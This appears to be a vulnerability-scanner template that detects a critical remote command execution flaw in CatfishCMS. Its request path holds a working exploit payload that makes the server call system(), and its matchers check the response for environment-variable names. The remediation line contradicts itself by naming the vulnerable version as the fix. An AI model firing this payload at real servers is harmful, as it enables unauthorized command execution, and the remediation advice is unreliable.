id: CNVD-2019-06255
info:
  name: CatfishCMS RCE
  author: Lark-Lab
  severity: critical
  description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
  remediation: Upgrade to CatfishCMS version 4.8.54 or later.
  reference:
    - https://its401.com/article/yun2diao/91344725
    - https://github.com/xwlrbh/Catfish/issues/4
  tags: rce,cnvd,catfishcms,cnvd2019
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
requests:
  - method: GET
    path:
      - "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - 'OS'
          - 'PATH'
          - 'SHELL'
          - 'USER'
        condition: and

# Enhanced by cs on 2022/02/28
